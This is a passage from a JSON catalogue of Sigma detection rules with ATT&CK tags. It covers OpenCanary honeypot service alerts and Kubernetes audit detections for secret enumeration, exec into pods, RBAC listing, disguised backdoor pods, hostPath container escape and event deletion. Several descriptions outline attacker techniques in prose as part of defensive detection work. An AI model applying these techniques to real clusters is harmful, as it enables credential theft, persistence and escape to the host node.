attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_vnc_connection_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_vnc_connection_attempt.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9db5446c-b44a-4291-8b89-fcab5609c3b3", "value": "OpenCanary - VNC Connection Attempt" }, { "description": "Detects instances where an SSH service on an OpenCanary node has had a connection attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ssh_new_connection.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ssh_new_connection.yml" ], "tags": [ "attack.initial-access", "attack.lateral-movement", "attack.persistence", "attack.t1133", "attack.t1021", "attack.t1078" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd55f721-5623-4663-bd9b-5229cab5237d", "value": "OpenCanary - SSH New Connection Attempt" }, { "description": "Detects instances where a TFTP service on an OpenCanary node has had a request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_tftp_request.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_tftp_request.yml" ], "tags": [ "attack.exfiltration", "attack.t1041" ] }, "related": [ { "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4e6b016-a2ac-4759-ad85-8000b300d61e", "value": "OpenCanary - TFTP Request" }, { "description": "Detects instances where an FTP service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ftp_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ftp_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.exfiltration", "attack.t1190", "attack.t1021" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6991bc2b-ae2e-447f-bc55-3a1ba04c14e5", "value": "OpenCanary - FTP Login Attempt" }, { "description": "Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_httpproxy_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_httpproxy_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.defense-evasion", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5498fc09-adc6-4804-b9d9-5cca1f0b8760", "value": "OpenCanary - HTTPPROXY Login Attempt" }, { "description": "Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_http_post_login_attempt.yml", "level": 
"high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_http_post_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af1ac430-df6b-4b38-b976-0b52f07a0252", "value": "OpenCanary - HTTP POST Login Attempt" }, { "description": "Detects instances where a GIT service on an OpenCanary node has had Git Clone request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_git_clone_request.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_git_clone_request.yml" ], "tags": [ "attack.collection", "attack.t1213" ] }, "related": [ { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fe17521-aef3-4e6a-9d6b-4a7c8de155a8", "value": "OpenCanary - GIT Clone Request" }, { "description": "Detects instances where an SNMP service on an OpenCanary node has had an OID request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": 
"opencanary_snmp_cmd.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_snmp_cmd.yml" ], "tags": [ "attack.discovery", "attack.lateral-movement", "attack.t1016", "attack.t1021" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9856028-fd4e-46e6-b3d1-10f7ceb95078", "value": "OpenCanary - SNMP OID Request" }, { "description": "Detects instances where a SIP service on an OpenCanary node has received a SIP request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_sip_request.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_sip_request.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e30de276-68ec-435c-ab99-ef3befec6c61", "value": "OpenCanary - SIP Request" }, { "description": "Detects instances where an SSH service on an 
OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ssh_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ssh_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.lateral-movement", "attack.persistence", "attack.t1133", "attack.t1021", "attack.t1078" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff7139bc-fdb1-4437-92f2-6afefe8884cb", "value": "OpenCanary - SSH Login Attempt" }, { "description": "Detects instances where a MySQL service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_mysql_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_mysql_login_attempt.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7d79a1b-25ed-4956-bd56-bd344fa8fd06", "value": "OpenCanary - MySQL Login Attempt" }, { "description": "Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_redis_command.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_redis_command.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "547dfc53-ebf6-4afe-8d2e-793d9574975d", "value": "OpenCanary - REDIS Action Command Attempt" }, { "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.\n", "meta": { "author": 
"Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_mssql_login_sqlauth.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_mssql_login_sqlauth.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ec9a16d-0b4f-4967-9542-ebf38ceac7dd", "value": "OpenCanary - MSSQL Login Attempt Via SQLAuth" }, { "description": "Detects instances where a Telnet service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_telnet_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_telnet_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.command-and-control", "attack.t1133", "attack.t1078" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "512cff7a-683a-43ad-afe0-dd398e872f36", "value": "OpenCanary - Telnet Login Attempt" }, { "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_mssql_login_winauth.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_mssql_login_winauth.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e78f90f-0043-4a01-ac41-f97681613a66", "value": "OpenCanary - MSSQL Login Attempt Via Windows Authentication" }, { "description": "Detects instances where an HTTP service on an OpenCanary node has received a GET request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_http_get.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ 
"https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_http_get.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af6c3078-84cd-4c68-8842-08b76bd81b13", "value": "OpenCanary - HTTP GET Request" }, { "description": "Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ntp_monlist.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ntp_monlist.yml" ], "tags": [ "attack.impact", "attack.t1498" ] }, "related": [ { "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cded4b3-f09e-405a-b96f-24248433ba44", "value": "OpenCanary - NTP Monlist Request" }, { "description": "Detects enumeration of Kubernetes secrets.", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret" ], "filename": "kubernetes_audit_secrets_enumeration.yml", "level": "low", "logsource.category": "application", 
"logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml" ], "tags": [ "attack.t1552.007" ] }, "related": [ { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eeb3e9e1-b685-44e4-9232-6bb701f925b5", "value": "Kubernetes Secrets Enumeration" }, { "description": "Detects when Kubernetes Secrets are modified or deleted.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Secrets being modified or deleted may be performed by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." ], "filename": "kubernetes_audit_secrets_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "58d31a75-a4f8-4c40-985b-373d58162ca2", "value": "Kubernetes Secrets Modified or Deleted" }, { "description": "Detects attempts to execute remote commands within a Pod's container, e.g. via the \"kubectl exec\" command.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Legitimate debugging activity. Investigate the identity performing the requests and their authorization." 
], "filename": "kubernetes_audit_exec_into_container.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml" ], "tags": [ "attack.t1609" ] }, "related": [ { "dest-uuid": "7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1b0ca4e-7835-413e-8471-3ff2b8a66be6", "value": "Potential Remote Command Execution In Pod Container" }, { "description": "Detects when a Kubernetes Rolebinding is created or modified.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Modifying a Kubernetes Rolebinding may need to be done by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." 
], "filename": "kubernetes_audit_rolebinding_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "10b97915-ec8d-455f-a815-9a78926585f6", "value": "Kubernetes Rolebinding Modification" }, { "description": "Detects creation of a new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_serviceaccount_creation.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml" ], "tags": [ "attack.t1136" ] }, "related": [ { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e31bae15-83ed-473e-bf31-faf4f8a17d36", "value": "New Kubernetes Service Account Created" }, { "description": "Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Modifying the Kubernetes Admission Controller may need to be done by a system 
administrator.", "Automated processes may need to take these actions and may need to be filtered." ], "filename": "kubernetes_audit_change_admission_controller.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://security.padok.fr/en/blog/kubernetes-webhook-attackers", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml" ], "tags": [ "attack.persistence", "attack.t1078", "attack.credential-access", "attack.t1552", "attack.t1552.007" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eed82177-38f5-4299-8a76-098d50d225ab", "value": "Kubernetes Admission Controller Modification" }, { "description": "Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.\nThis may indicate an attacker attempting to leverage credentials they have obtained.\n", "meta": { "author": "kelnage", "creation_date": "2024-04-12", "falsepositive": [ "A misconfigured RBAC policy, a mistake by a valid user, or a wider issue with authentication tokens can also generate these errors." 
], "filename": "kubernetes_audit_unauthorized_unauthenticated_actions.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "0d933542-1f1f-420d-97d4-21b2c3c492d9", "value": "Kubernetes Unauthorized or Unauthenticated Access" }, { "description": "Detects when a Kubernetes CronJob or Job is created or modified.\nA Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.\nAn adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Modifying a Kubernetes Job or CronJob may need to be done by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." 
], "filename": "kubernetes_audit_cronjob_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.execution" ] }, "uuid": "0c9b3bda-41a6-4442-9345-356ae86343dc", "value": "Kubernetes CronJob/Job Modification" }, { "description": "Detects identities attempting to enumerate their Kubernetes RBAC permissions.\nIn the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.\nIn a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. 
a \"kubectl auth can-i --list\" command.\nThis will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_rbac_permisions_listing.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml" ], "tags": [ "attack.t1069.003", "attack.t1087.004" ] }, "related": [ { "dest-uuid": "16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b777bd-c946-4d17-aa2e-c39f5a454325", "value": "RBAC Permission Enumeration Attempt" }, { "description": "Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.\nSystem pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.\nAttackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.\nDeployment of such a backdoor container e.g. 
named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace" ], "filename": "kubernetes_audit_pod_in_system_namespace.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml" ], "tags": [ "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a80d927d-ac6e-443f-a867-e8d6e3897318", "value": "Creation Of Pod In System Namespace" }, { "description": "Detects creation of a container with a hostPath mount.\nA hostPath volume mounts a directory or a file from the node to the container.\nAttackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace." 
], "filename": "kubernetes_audit_hostpath_mount.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/", "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml" ], "tags": [ "attack.t1611" ] }, "related": [ { "dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "402b955c-8fe0-4a8c-b635-622b4ac5f902", "value": "Container With A hostPath Mount Created" }, { "description": "Detects when events are deleted in Kubernetes.\nAn adversary may delete Kubernetes events in an attempt to evade detection.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_events_deleted.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml" ], "tags": [ "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 